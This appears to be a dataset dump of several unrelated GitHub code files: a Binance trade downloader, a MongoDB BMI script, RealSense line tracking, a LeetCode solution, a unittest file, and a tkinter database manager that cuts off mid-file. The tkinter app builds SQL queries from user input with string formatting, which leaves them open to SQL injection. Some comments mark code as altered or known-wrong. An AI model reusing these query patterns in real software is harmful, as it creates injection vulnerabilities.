last_trade_timestamp = valid_trades[-1][\"T\"]\n else:\n log_message(f\"Error {response.status_code}: {response.text}\", log_file_name)\n return all_trades\n\n return all_trades\n\ndef fetch_data_for_timeframe(symbol, start_date, end_date, output_file, log_file_name):\n current_start = date_to_epoch(start_date)\n end_timestamp = date_to_epoch(end_date) + (24 * 60 * 60 * 1000) - 1\n\n # Write the CSV header only once at the beginning\n with open(output_file, 'w', newline='') as csvfile:\n fieldnames = [\"Aggregate tradeId\", \"Price\", \"Quantity\", \"First tradeId\", \"Last tradeId\", \"Timestamp\", \"Was the buyer the maker?\", \"Was the trade the best price match?\"]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n\n while current_start < end_timestamp:\n current_end = current_start + (24 * 60 * 60 * 1000)\n if current_end > end_timestamp:\n current_end = end_timestamp\n\n data = fetch_binance_data(symbol, current_start, current_end, log_file_name)\n\n # Save the fetched data for the current day to the CSV\n with open(output_file, 'a', newline='') as csvfile:\n fieldnames = [\"Aggregate tradeId\", \"Price\", \"Quantity\", \"First tradeId\", \"Last tradeId\", \"Timestamp\", \"Was the buyer the maker?\", \"Was the trade the best price match?\"]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n for row in data:\n writer.writerow({\n \"Aggregate tradeId\": row[\"a\"],\n \"Price\": row[\"p\"],\n \"Quantity\": row[\"q\"],\n \"First tradeId\": row[\"f\"],\n \"Last tradeId\": row[\"l\"],\n \"Timestamp\": row[\"T\"],\n \"Was the buyer the maker?\": row[\"m\"],\n \"Was the trade the best price match?\": row[\"M\"]\n })\n\n log_message(f\"Data for interval {current_start} to {current_end} written to {output_file}\", log_file_name)\n current_start = current_end\n time.sleep(1.1)\n\n log_message(f\"Data fetching and saving completed for {start_date} to {end_date}.\", log_file_name)\n\n\ndef main():\n start_time = time.time()\n\n symbol = \"BTCUSDT\"\n \n # Check for command-line arguments for start_date and end_date\n if len(sys.argv) == 3:\n start_date = sys.argv[1]\n end_date = sys.argv[2]\n else:\n start_date 
= input(\"Enter the start date (YYYY-MM-DD): \")\n end_date = input(\"Enter the end date (YYYY-MM-DD): \")\n\n output_file = f\"binance_data_{start_date}_to_{end_date}.csv\"\n log_file_name = f\"binance_data_log_{start_date}_to_{end_date}.txt\"\n \n fetch_data_for_timeframe(symbol, start_date, end_date, output_file, log_file_name)\n\n end_time = time.time()\n elapsed_time = end_time - start_time\n log_message(f\"Script completed in {elapsed_time:.2f} seconds.\", log_file_name)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"garyzava/excess-return-analysis","sub_path":"other_sources/binance_api_fetcher.py","file_name":"binance_api_fetcher.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21251512476","text":"import csv\nfrom datetime import datetime, timedelta\nimport io\nimport pandas as pd\nimport numpy as np\n\nimport pymongo\nimport math\n\n# To run mongod in Windows: mongod --dbpath ~/data &\n# Configure MongoDB\n\nconnection = pymongo.MongoClient('mongodb://localhost:27017')\ndb = connection['catalog']\n\ndef create_recording(aType, _datetime, count):\n assert aType is not None\n assert _datetime is not None\n assert count is not None\n\n db.recordings.insert_one({\n \"type\": aType,\n \"datetime\": _datetime,\n \"count\": count,\n })\n\ndef upload_recording_to_df(file):\n assert file is not None\n\n #data = file.read()\n df1 = pd.read_csv(file, header=0, encoding = \"utf-8\")\n aList = []\n\n for index, row in df1.iterrows():\n aList.append([row[\"Id\"], row[\"created_at\"], row['Type'], 1])\n\n df2 = pd.DataFrame(aList, columns=['id', 'created_at', 'type', 'count'])\n\n df2[\"created_at\"] = pd.to_datetime(df2[\"created_at\"])\n df2[\"Date_received_year\"] = pd.DatetimeIndex(df2[\"created_at\"]).year\n df2[\"Date_received_qtr\"] = df2[\"created_at\"].dt.quarter\n df2[\"Date_received_year_qtr\"] = df2[\"Date_received_year\"].astype(str) + ' Q' + df2[\"Date_received_qtr\"].astype(str) \n\n df3 = pd.pivot_table(df2, values=\"count\", index=[\"Date_received_year_qtr\"], columns=[\"type\"], aggfunc=np.sum)\n \n return df3\n\ndef csv_to_dict(file):\n\n with file as read_obj:\n # pass the file object to DictReader() to get the DictReader object\n dict_reader = csv.DictReader(read_obj)\n # get a list of dictionaries from dct_reader\n list_of_dict = list(dict_reader)\n # print list of dict i.e. 
rows\n return (list_of_dict)\n\ndef upload_recording_to_mongodb(file, db):\n\n assert file is not None\n\n dictList = csv_to_dict(file)\n for aDict in dictList:\n aDict[\"created_at\"] = datetime.strptime(aDict['created_at'], \"%a %b %d %H:%M:%S %z %Y\")\n aDict[\"Date_received_year\"] = aDict[\"created_at\"].year\n aDict['Date_received_qtr'] = math.ceil(aDict[\"created_at\"].month/3)\n aDict['Date_received_year_qtr'] = str(aDict[\"Date_received_year\"]) + \"-\" + str(aDict[\"Date_received_qtr\"])\n db.recordings.insert_one(aDict)\n\n#f1 = open(\"static/sample.csv\", \"r\")\n#f2 = open(\"static/countByQuarter.csv\", \"w\")\n\n# // Using Pandas\n#df2 = upload_recording_to_df(f1)\n# print(df2.index.to_list())\n# print(df2.columns.to_list())\n# df2['text'] = df2['text'].fillna(0)\n# print(df2['text'].to_list())\n\n# // Using MongoDB\n\n#upload_recording_to_mongodb(f1, db)\n\ndef pivotCount(db):\n\n results = db.recordings.aggregate(\n [\n # count occurence\n # https://stackoverflow.com/questions/27177836/how-to-count-all-occurrences-of-an-element-in-mongodb \n\n {\"$group\":{\"_id\":\"$Type\",\"count\":{\"$sum\": 1}}},\n #{\"$project\":{\"Type\":\"$_id\",\"occurance\":\"$count\"}}\n {\"$project\":{\"count\": 1}}\n\n ]\n )\n\n return results\n\n# results = pivotCount(db)\n\n# for record in results:\n# print(record)\n\nf1 = open(\"static/DataSet2.csv\", \"r\")\n#f2 = open(\"static/DataSet3.csv\", \"w\")\n\n# def rePopulate(f1, f2):\n\n# dictList = csv_to_dict(file)\n\n# for aDict in dictList:\n# aDict[\"created_at\"] = datetime.strptime(aDict['created_at'], \"%a %b %d %H:%M:%S %z %Y\")\n# aDict[\"Date_received_year\"] = aDict[\"created_at\"].year\n# aDict['Date_received_qtr'] = math.ceil(aDict[\"created_at\"].month/3)\n# aDict['Date_received_year_qtr'] = str(aDict[\"Date_received_year\"]) + \"-\" + str(aDict[\"Date_received_qtr\"])\n# db.recordings.insert_one(aDict)\n\n\ndata = csv_to_dict(f1)\n\nreadings={}\nbDate = datetime(3000, 1, 1)\nlDate = datetime(2000, 12, 31)\n\ndef getReadings(data):\n\n readings = {}\n bDate = datetime(3000, 1, 1)\n lDate = datetime(2000, 12, 31)\n\n for item in data:\n\n parts = [int(x) for x in item['Date'].split('-')]\n myDate = datetime(parts[0], parts[1], parts[2])\n\n if myDate <= bDate:\n bDate = myDate\n\n if myDate >= lDate:\n lDate = myDate\n \n if readings.get(item['User']):\n readings[item['User']].append([item['Date'], item['BMI']]) \n else:\n readings[item['User']] = [[item['Date'], item['BMI']]]\n\n return readings, bDate, lDate\n\ndef dataPrep(readings, bDate, lDate):\n\n chartDim = {}\n labels = []\n\n start_date = bDate\n end_date = lDate\n delta = timedelta(days=1)\n\n while start_date <= end_date:\n\n month = str(start_date.month) # months from 1-12\n day = str(start_date.day)\n year = str(start_date.year)\n\n aDateString = year + \"-\" + month + \"-\" + day\n labels.append(aDateString);\n\n for key, values in readings.items():\n\n if not chartDim.get(key):\n chartDim[key]=[]; \n \n filled = False\n\n for item in values:\n\n parts=[ int(x) for x in item[0].split('-') ]\n mydate = datetime(parts[0], parts[1], parts[2]) \n \n if mydate == start_date:\n \n chartDim[key].append(item[1])\n filled = True\n\n else:\n\n if mydate > start_date:\n if not filled:\n chartDim[key].append(-1)\n break\n\n start_date += delta\n\n return chartDim, labels\n\n#readings, bDate, lDate = getReadings(data)\n\n#print(readings, bDate, lDate)\n\n#chartDim, labels = dataPrep(readings, bDate, lDate)\n\n#print(chartDim, labels)\n\ndb2 = connection['bmi']\n\ndef 
getAverage(db):\n\n    aveDict = {}\n    resCursor = db.readings.find({}) \n    readings = resCursor[0][\"readings\"]\n    \n    for key, values in readings.items():\n\n        # fix: reset the accumulators for every user, otherwise earlier users' readings leak into later averages\n        sum=0\n        count=0\n        for value in values:\n            sum += float(value[1])\n            count += 1\n        \n        aveDict[key]=sum/count\n    \n    return aveDict\n\naveDict = getAverage(db2)\nprint(aveDict)\n\n","repo_name":"paulhjwu/ICT239_Stage2","sub_path":"Jean's/ICT239_final/BMI/trial.py","file_name":"trial.py","file_ext":"py","file_size_in_byte":6011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27976434380","text":"import pyrealsense2 as rs\nimport copy\nimport argparse\nimport cv2\nimport numpy as np\nimport onnxruntime\nimport math\nimport json\nfrom scipy.spatial.transform import Rotation as R\n\n# result is wrong...\ndef xyz2qua(vec):\n    '''\n    return quaternion angle to xyz=(1, 0, 0)\n    :param vec:\n    :return: qua\n    '''\n    x, y, z = vec\n    zdegree = math.degrees(math.atan(z / x))\n    ydegree = math.degrees(math.atan(y / x))\n    # rot = R.from_euler('zyx', [0, -ydegree, zdegree], degrees=True) # to unity coord\n    theta = [0, -ydegree, zdegree] # to unity coord\n    rot = R.from_euler('xyz', theta, degrees=True)\n    qua = rot.as_quat()\n    return qua\n\ndef save_json(lines):\n    info = {\"LineFeatures\": []}\n    for idx,(p1, p2) in enumerate(lines):\n        # opencv to Unity3D coordinate\n        y, x, z = p1\n        yy, xx, zz = p2\n        y, yy = -y, -yy\n\n        scale = math.sqrt((x-xx)**2+(y-yy)**2+(z-zz)**2)\n        center = (x+xx)/(2*scale), (y+yy)/(2*scale), (z+zz)/(2*scale)\n        vec = xx-x, yy-y, zz-z\n        qua = xyz2qua(vec)\n\n        info[\"LineFeatures\"].append(\n            {\n                \"ID\": idx,\n                \"Type\": \"LineFeature\",\n                \"Position\": {\n                    \"x\": center[0],\n                    \"y\": center[1],\n                    \"z\": center[2]\n                },\n                \"Rotation\": {\n                    \"x\": qua[0],\n                    \"y\": qua[1],\n                    \"z\": qua[2],\n                    \"w\": qua[3]\n                },\n                \"Scale\": {\n                    \"x\": scale,\n                    \"y\": scale,\n                    \"z\": scale\n                },\n                \"Positions\": [\n                    {\n                        \"x\": x/scale,\n                        \"y\": y/scale,\n                        \"z\": z/scale\n                    },\n                    {\n                        \"x\": xx/scale,\n                        \"y\": yy/scale,\n                        \"z\": zz/scale\n                    }\n                ]\n            }\n        )\n    json_object = json.dumps(info, indent=4)\n\n    # Writing to sample.json\n    with open(\"sample.json\", \"w\") as outfile:\n        outfile.write(json_object)\n\n    return\n\ndef get_depth(point, depth_map):\n    def generate_points(point):\n        x, y = point\n        shift_pix = 10\n        return [(x, y),\n                (x+shift_pix, y), (x, y+shift_pix),\n                (x-shift_pix, y), (x, y-shift_pix),\n                (x+shift_pix, y+shift_pix), (x+shift_pix, y-shift_pix),\n                (x-shift_pix, y+shift_pix), (x-shift_pix, y-shift_pix)]\n\n    points = generate_points(point)\n    depths = []\n    for i, j in points:\n        depth = depth_map[min(max(i,0), depth_map.shape[0]-1), min(max(0,j), depth_map.shape[1]-1)]\n        if depth>1e-10:\n            depths.append(depth)\n\n    if depths:\n        return min(depths)\n    else:\n        return 0\n\ndef camera2world(lines, depth_map, depth_intrin):\n    world_lines = []\n    # print(f'depth_scale {depth_scale}')\n    for line, _ in lines:\n        (x, y, xx, yy) = line.astype(int)\n\n        # print(x,y,xx,yy, line, depth_map.shape)\n        # (repaired: a comparison operator was lost in extraction here; a simple positivity check is assumed)\n        if (x>0 and xx>0 and y>0 and yy>0):\n            pass\n        else:\n            continue\n\n        # z = depth_map[y, x]*depth_scale\n        z = get_depth((y, x), depth_map)*depth_scale\n        dx, dy, dz = rs.rs2_deproject_pixel_to_point(\n            depth_intrin, [y, x], z)\n\n        # zz = depth_map[yy, xx] * depth_scale\n        zz = get_depth((yy, xx), depth_map) * depth_scale\n        dxx, dyy, dzz = rs.rs2_deproject_pixel_to_point(\n            depth_intrin, [yy, xx], zz)\n\n        world_lines.append([(dx, dy, dz), (dxx, dyy, dzz)])\n\n    return world_lines\n
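\n# [Editor's note, added] rs2_deproject_pixel_to_point applies the camera's pinhole model from the\n# stream intrinsics; roughly X = (u - ppx) / fx * depth, Y = (v - ppy) / fy * depth, Z = depth\n# (a sketch assuming no lens distortion -- the library call also handles distortion models).\ndef shift_point(box):\n    \"\"\"\n    shift for better iou 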
calculation\n    :param box: xyxy (top-left, bottom-right)\n    :return xyxy:\n    \"\"\"\n    xmin, ymin, xmax, ymax = box[0], box[1], box[2], box[3]\n    thred = 20\n    if xmax - xmin < thred:\n        xmax += 100 - (xmax - xmin)\n    if ymax - ymin < thred:\n        ymax += 100 - (ymax - ymin)\n    return xmin, ymin, xmax, ymax\n\n\ndef cal_iou(box1, box2):\n    \"\"\"\n    :param box1: xyxy (top-left, bottom-right)\n    :param box2: xyxy\n    :return:\n    \"\"\"\n\n    x1min, y1min, x1max, y1max = shift_point(box1)\n    x2min, y2min, x2max, y2max = shift_point(box2)\n\n    # compute the areas of the two boxes\n    s1 = (y1max - y1min + 1.) * (x1max - x1min + 1.)\n    s2 = (y2max - y2min + 1.) * (x2max - x2min + 1.)\n\n    # compute the coordinates of the intersection\n    xmin = max(x1min, x2min)\n    ymin = max(y1min, y2min)\n    xmax = min(x1max, x2max)\n    ymax = min(y1max, y2max)\n\n    inter_h = max(ymax - ymin + 1, 0)\n    inter_w = max(xmax - xmin + 1, 0)\n\n    intersection = inter_h * inter_w\n    union = s1 + s2 - intersection\n\n    # compute the IoU\n    iou = intersection / union\n    return iou\n\nclass M_LSD:\n    def __init__(self, modelpath, conf_thres=0.5, dist_thres=20.0):\n        # Initialize model ['CUDAExecutionProvider', 'CPUExecutionProvider']\n        self.onnx_session = onnxruntime.InferenceSession(modelpath, providers=['CUDAExecutionProvider'])\n        self.input_name = self.onnx_session.get_inputs()[0].name\n        self.output_names = [self.onnx_session.get_outputs()[i].name for i in range(3)]\n\n        self.input_shape = self.onnx_session.get_inputs()[0].shape ### n,h,w,c\n        self.input_height = self.input_shape[1]\n        self.input_width = self.input_shape[2]\n        self.conf_threshold = conf_thres\n        self.dist_threshold = dist_thres\n\n    def prepare_input(self, image):\n        resized_image = cv2.resize(image, dsize=(self.input_width, self.input_height), interpolation=cv2.INTER_AREA)\n        input_image = np.concatenate([resized_image, np.ones([self.input_height, self.input_width, 1])], axis=-1)\n        input_image = np.expand_dims(input_image, axis=0).astype('float32')\n        return input_image\n\n    def detect(self, image, pre_lines=None, start_id=0, depth_map=None, depth_intrin=None):\n        \"\"\"\n        :param image: xyxy\n        :param lines: [(xyxy, idx)]\n        :return:\n        \"\"\"\n        h_ratio, w_ratio = [image.shape[0] / self.input_height, image.shape[1] / self.input_width]\n        input_image = self.prepare_input(image)\n\n        # Perform inference on the image\n        result = self.onnx_session.run(self.output_names, {self.input_name: input_image})\n\n        pts = result[0][0]\n        pts_score = result[1][0]\n        vmap = result[2][0]\n\n        start = vmap[:, :, :2]\n        end = vmap[:, :, 2:]\n        dist_map = np.sqrt(np.sum((start - end) ** 2, axis=-1))\n\n        segments_list = []\n        for center, score in zip(pts, pts_score):\n            y, x = center\n            distance = dist_map[y, x]\n            if score > self.conf_threshold and distance > self.dist_threshold:\n                disp_x_start, disp_y_start, disp_x_end, disp_y_end = vmap[y, x, :]\n                x_start = x + disp_x_start\n                y_start = y + disp_y_start\n                x_end = x + disp_x_end\n                y_end = y + disp_y_end\n                segments_list.append([x_start, y_start, x_end, y_end])\n\n        lines = 2 * np.array(segments_list) # 256 > 512\n        lines_with_id = []\n\n        try:\n            lines[:, 0] = lines[:, 0] * w_ratio\n            lines[:, 1] = lines[:, 1] * h_ratio\n            lines[:, 2] = lines[:, 2] * w_ratio\n            lines[:, 3] = lines[:, 3] * h_ratio\n\n            # Draw Line\n            dst_image = copy.deepcopy(image)\n            for line in lines:\n                x_start, y_start, x_end, y_end = [int(val) for val in line]\n\n                max_iou = 0\n                thred = 0.8\n                nearest = False\n                for point, idx in pre_lines:\n                    iou = cal_iou(line, point)\n\n                    if iou > max_iou:\n                        nearest = point, idx\n                        max_iou = iou\n\n                if max_iou > thred:\n                    cur_id = nearest[1]\n                    # info = f'old {cur_id} iou{max_iou:.2f}'\n
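                    # [Editor's note, added] greedy track association: a detection inherits the ID of\n                    # the previous-frame line with the highest IoU above the 0.8 threshold; otherwise\n                    # a fresh ID is issued in the else-branch below.\n                    info = f'id 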
{cur_id}'\n                    lines_with_id.append((line, cur_id))\n                else:\n                    cur_id = start_id\n                    # info = f'new {cur_id} iou{max_iou:.2f}'\n                    info = f'id {cur_id}'\n                    lines_with_id.append((line, cur_id))\n                    start_id += 1\n\n\n                cv2.line(dst_image, (x_start, y_start), (x_end, y_end), [0, 0, 255], 3)\n\n                center = ((x_start + x_end) // 2, (y_start + y_end) // 2)\n                global depth_scale\n                center_depth = depth_map[center[1], center[0]]*depth_scale if depth_map is not None else False\n\n                world_coord = camera2world([(line, cur_id)], depth_map, depth_intrin)\n                try:\n                    (dx, dy, dz), (dxx, dyy, dzz) = world_coord[0]\n                    distance = math.sqrt(((dx-dxx) ** 2) + ((dy-dyy) ** 2) + ((dz-dzz) ** 2))\n                    info += f' l:{distance:.2f}'\n\n                    org = center # (x1, y1)\n                    font = cv2.FONT_HERSHEY_SIMPLEX\n                    dst_image = cv2.putText(dst_image, f'{info}', org, font,\n                                            fontScale=0.5, color=(255, 0, 0), thickness=2, lineType=cv2.LINE_AA)\n                    # (fix: a duplicate lines_with_id.append((line, start_id)) / start_id += 1 pair was\n                    # removed here -- the line is already appended with its ID in the if/else branches above)\n                    # info = info + f' no depth' if not center_depth else info + f' depth{center_depth:.2f}'\n                except:\n                    pass\n\n\n        except:\n            dst_image = copy.deepcopy(image)\n            pass\n        return dst_image, lines_with_id, start_id\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--modelpath', type=str, default='.\\M-LSD-onnxrun-cpp-py\\weights\\model_512x512_large.onnx', help=\"onnx filepath\")\n    parser.add_argument('--confThreshold', default=0.5, type=float, help='class confidence')\n    parser.add_argument('--distThreshold', default=20.0, type=float, help='dist threshold')\n    args = parser.parse_args()\n\n    # using M-LSD model\n    print('using M-LSD')\n    detector = M_LSD(args.modelpath, conf_thres=args.confThreshold, dist_thres=args.distThreshold)\n\n    # Configure depth and color streams\n    print('Configuring realsense')\n    pipeline = rs.pipeline()\n    config = rs.config()\n\n    # Get device product line for setting a supporting resolution\n    pipeline_wrapper = rs.pipeline_wrapper(pipeline)\n    pipeline_profile = config.resolve(pipeline_wrapper)\n    device = pipeline_profile.get_device()\n    device_product_line = str(device.get_info(rs.camera_info.product_line))\n\n    found_rgb = False\n    for s in device.sensors:\n        if s.get_info(rs.camera_info.name) == 'RGB Camera':\n            found_rgb = True\n            break\n    if not found_rgb:\n        print(\"The demo requires Depth camera with Color sensor\")\n        exit(0)\n\n    config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)\n\n    if device_product_line == 'L500':\n        config.enable_stream(rs.stream.color, 960, 540, rs.format.bgr8, 30)\n    else:\n        config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)\n\n    # Start streaming\n    print('starting streaming')\n    # pipeline.start(config)\n\n    profile = pipeline.start(config)\n    global depth_scale\n    depth_scale = profile.get_device().first_depth_sensor().get_depth_scale()\n\n    # set depth parameters\n    # 0 for depth sensor, 1 for camera sensor\n    sensor = profile.get_device().query_sensors()[0]\n    sensor.set_option(rs.option.min_distance, 0)\n    # sensor.set_option(rs.option.confidence_threshold, 1)\n    # # sensor.set_option(rs.option.max_distance, 190)\n    # sensor.set_option(rs.option.laser_power, 95)\n    # sensor.set_option(rs.option.noise_filtering, 1)\n    # sensor.set_option(rs.option.receiver_gain, 18)\n    # sensor.set_option(rs.option.post_processing_sharpening, 1)\n    # sensor.set_option(rs.option.pre_processing_sharpening, 0)\n    # sensor.set_option(rs.option.global_time_enabled, 1.0)\n\n    # for color sensor\n    sensor = profile.get_device().query_sensors()[1]\n
    sensor.set_option(rs.option.global_time_enabled, 1.0)\n\n    align_to = rs.stream.depth\n    align = rs.align(align_to)\n\n    count = 0\n    lines = []\n    start_id = 0\n    try:\n        while count < 50:\n\n            count += 1\n\n            # Get frameset of color and depth\n            frames = pipeline.wait_for_frames()\n            # frames.get_depth_frame() is a 640x360 depth image\n\n            # Align the depth frame to color frame\n            aligned_frames = align.process(frames)\n\n            # Get aligned frames\n            depth_frame = aligned_frames.get_depth_frame() # aligned_depth_frame is a 640x480 depth image\n            color_frame = aligned_frames.get_color_frame()\n\n            # Convert images to numpy arrays\n            depth_colormap = depth_image = np.asanyarray(depth_frame.get_data())\n            color_image = np.asanyarray(color_frame.get_data())\n\n            depth_colormap_dim = depth_colormap.shape\n            color_colormap_dim = color_image.shape\n\n            # If depth and color resolutions are different, resize color image to match depth image for display\n            if depth_colormap_dim != color_colormap_dim:\n                # print(depth_colormap_dim, color_colormap_dim)\n                color_image = cv2.resize(color_image, dsize=(depth_colormap_dim[1], depth_colormap_dim[0]),\n                                         interpolation=cv2.INTER_AREA)\n\n            # Apply colormap on depth image (image must be converted to 8-bit per pixel first)\n            depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.03), cv2.COLORMAP_JET)\n\n            # line detection\n\n            depth_intrin = aligned_frames.get_color_frame().profile.as_video_stream_profile().intrinsics\n            # color_image = detector.detect(color_image, depth_image)\n            color_image, lines, start_id = detector.detect(color_image, lines, start_id, depth_image, depth_intrin)\n\n            if lines:\n                world_lines = camera2world(lines, depth_image, depth_intrin)\n                save_json(world_lines)\n                cv2.imwrite('last_frame.png', color_image)\n                # print(world_lines)\n\n            depth_colormap_dim = depth_colormap.shape\n            color_colormap_dim = color_image.shape\n\n            # If depth and color resolutions are different, resize color image to match depth image for display\n            if depth_colormap_dim != color_colormap_dim:\n                color_image = cv2.resize(color_image, dsize=(depth_colormap_dim[1], depth_colormap_dim[0]), interpolation=cv2.INTER_AREA)\n\n            images = np.hstack((color_image, depth_colormap))\n\n            # Show images\n            cv2.namedWindow('RealSense', cv2.WINDOW_AUTOSIZE)\n            cv2.imshow('RealSense', images)\n            cv2.waitKey(1)\n\n    finally:\n        # Stop streaming\n        pipeline.stop()","repo_name":"dizhima/LineTracking","sub_path":"mlsd_depth_tracking.py","file_name":"mlsd_depth_tracking.py","file_ext":"py","file_size_in_byte":15234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32846784288","text":"class Solution:\n    def numSquares1(self, n):\n        \"\"\"\n        :type n: int\n        :rtype: int\n        \"\"\"\n        # Define the DP state array: each dp[i] holds the minimum number of perfect squares that sum to i.\n
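        # [Added example, not in the original] n = 12: dp[12] = dp[12 - 2*2] + 1 = dp[8] + 1 = 3\n        # (12 = 4 + 4 + 4), which beats j = 3 giving dp[12 - 9] + 1 = dp[3] + 1 = 4.\n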
        dp = [0] * (n + 1)\n\n        # Perform the state transitions, building the answer up from smaller amounts layer by layer.\n        for i in range(1, n + 1):\n            dp[i] = i # worst case is all 1s (i ones added together); we then try to do better, since fewer terms is the goal\n            # try to improve the count by carving out a larger square j*j\n            for j in range(1, int(i ** 0.5) + 1):\n                dp[i] = min(dp[i], dp[i - j * j] + 1)\n        return dp[n]\n\nif __name__ == '__main__':\n    n = 13\n    solution = Solution()\n    res = solution.numSquares1(n)\n    print(res)","repo_name":"chenximei/LeetCode","sub_path":"279 Perfect Squares.py","file_name":"279 Perfect Squares.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72291990884","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\ntest_utils\n------------\n\nTests for `complexity.utils` module.\n\"\"\"\n\nimport shutil\nimport sys\n\nfrom complexity import utils\n\nif sys.version_info[:2] < (2, 7):\n    import unittest2 as unittest\nelse:\n    import unittest\n\n\nclass TestUtils(unittest.TestCase):\n\n    def test_make_sure_path_exists(self):\n        self.assertTrue(utils.make_sure_path_exists('/usr/'))\n        self.assertTrue(utils.make_sure_path_exists('tests/blah'))\n        self.assertTrue(utils.make_sure_path_exists('tests/trailingslash/'))\n        self.assertFalse(\n            utils.make_sure_path_exists(\n                '/this-dir-does-not-exist-and-cant-be-created/'\n            )\n        )\n        shutil.rmtree('tests/blah/')\n        shutil.rmtree('tests/trailingslash/')\n\n    def test_unicode_open(self):\n        \"\"\" Test unicode_open(filename, *args, **kwargs). \"\"\"\n\n        unicode_text = u\"\"\"Polish: Ą Ł Ż\nChinese: 倀 倁 倂 倃 倄 倅 倆 倇 倈\nMusical Notes: ♬ ♫ ♯\"\"\"\n\n        with utils.unicode_open('tests/files/unicode.txt') as f:\n            opened_text = f.read()\n        self.assertEqual(unicode_text, opened_text)\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"audreyfeldroy/complexity","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":116,"dataset":"github-code","pt":"52"} +{"seq_id":"69799962084","text":"from tkinter import *\nfrom tkinter import ttk\nfrom tkinter import messagebox\nimport sqlalchemy\nfrom sqlalchemy import create_engine\nfrom sqlalchemy import exc\nfrom config import auth\nimport psycopg2\n\ndef set_engine(login=auth['login'], password=auth['password'], db_name='project_db'):\n    return create_engine('postgresql+psycopg2://{}:{}@localhost/{}'.format(login, password, db_name))\n\ndef show_error(error_text: str, window_to_destroy):\n    messagebox.showerror(\"Error\", \"{}\".format(error_text))\n    window_to_destroy.destroy()\n\ntry:\n    engine = set_engine()\n    cursor = engine.connect()\nexcept sqlalchemy.exc.OperationalError:\n    print(\"DEBUG:: Database doesn't exist or username/password incorrect\")\nelse:\n    print(\"DEBUG:: SQLalchemy connected to default database\")\n\n\nroot = Tk()\nroot.geometry('400x250')\nroot.title('Senku app')\nroot.iconbitmap('Python-icon.ico')\n\n#Database list management\ndb_listbox = Listbox()\ndb_list = list()\nfor item in list(cursor.execute('select * from databases')):\n    db_list.append(list(item)[0])\ncurrent_database = 0\n\nfor item in db_list:\n    db_listbox.insert(END, item)\n\ndef create_database():\n    def creation():\n        if name.get():\n            if name.get() in db_list:\n                show_error(\"Such a database already exists\", create_window)\n            else:\n                try:\n                    query = '''select create_db('{}');'''.format(name.get())\n                    cursor.execute(query)\n                    db_list.append(name.get())\n                    db_listbox.insert(END, name.get())\n                    create_window.destroy()\n
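                # [Editor's note, added] building SQL with str.format() is open to SQL injection;\n                # parameter binding (e.g. sqlalchemy.text(\"select create_db(:n)\") executed with a\n                # bound :n) would be safer -- a general observation, not the original author's code.\n                except 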
psycopg2.errors.SqlclientUnableToEstablishSqlconnection:\n                    print(\"DEBUG:: Error while creating database: could not establish connection\")\n                    show_error(\"Could not establish connection\", create_window)\n        else:\n            show_error(\"The input field is empty\", create_window)\n\n    create_window = Toplevel(root)\n    create_window.title('Create new database')\n    create_window.geometry('250x150')\n    create_window.iconbitmap('Python-icon.ico')\n\n    name = StringVar()\n    title = Label(create_window, text='Enter database name')\n    enter = Entry(create_window, textvariable=name)\n    create = Button(create_window, text='Create database', width=16, command=creation)\n\n    title.place(anchor=CENTER, x=125, y=25)\n    enter.place(anchor=CENTER, x=125, y=50)\n    create.place(anchor=CENTER, x=125, y=80)\n\n\ndef select_database():\n    #global cursor\n    global current_database\n    try:\n        index = db_listbox.curselection()[0]\n        current_database = index\n        messagebox.showinfo(\"Success\", \"You have successfully switched to '{}' database\".format(db_list[index]))\n        #print(\"DEBUG:: Trying to connect to database with name {}\".format(db_list[index]))\n        #engine = set_engine(db_name=db_list[index])\n        #cursor = engine.connect()\n    except IndexError:\n        messagebox.showerror(\"Error\", \"No items selected\")\n    except sqlalchemy.exc.OperationalError:\n        print(\"DEBUG:: Database {} doesn't exist or username/password incorrect\".format(db_list[index]))\n    else:\n        print(\"DEBUG:: Switched to database with name - {}\".format(db_list[index]))\n    \n\ndef delete_database():\n    try:\n        index = db_listbox.curselection()[0]\n        if index == 0:\n            messagebox.showerror(\"Error\", \"Unable to drop 'mother' database\")\n            return\n        query = '''select delete_db('{}');'''.format(db_list[index])\n        cursor.execute(query)\n        db_listbox.delete(index)\n        db_list.remove(db_list[index])\n    except IndexError:\n        messagebox.showerror(\"Error\", \"No items selected\")\n    except:\n        messagebox.showerror(\"Error\", \"Delete error\")\n        print(\"DEBUG:: Error deleting database with name - {}\".format(db_list[index]))\n    else:\n        messagebox.showinfo(\"Success\", \"Successfully deleted\")\n\n\ndef details():\n    def open_table():\n        def refresh_table():\n            table.delete(*table.get_children())\n            rows.clear()\n            for item in cursor.execute(\"select * from get_{}('{}','')\".format(table_list[subindex], db_list[index])):\n                rows.append(item)\n            for row in rows:\n                table.insert('', END, values=tuple(row))\n\n\n        def search_in_table():\n            if search_item.get():\n                try:\n                    table.delete(*table.get_children())\n                    temp_rows = list()\n                    for item in cursor.execute(\"select * from get_{}('{}','{}')\".format(table_list[subindex], db_list[index], search_item.get())):\n                        temp_rows.append(item)\n                    for row in temp_rows:\n                        table.insert('', END, values=tuple(row))\n                except:\n                    show_error(\"Something went wrong\", table_window)\n            else:\n                refresh_table()\n        \n\n        def delete_rows():\n            try:\n                if table_list[subindex] == 'finances':\n                    messagebox.showerror(\"Error\", \"No rights to delete data from this table ({})\".format(table_list[subindex]))\n                    return\n                for item in table.selection():\n                    item_text = table.item(item)['values']\n                    cursor.execute(\"select delete_rows('{}','{}','{}')\".format(db_list[index], 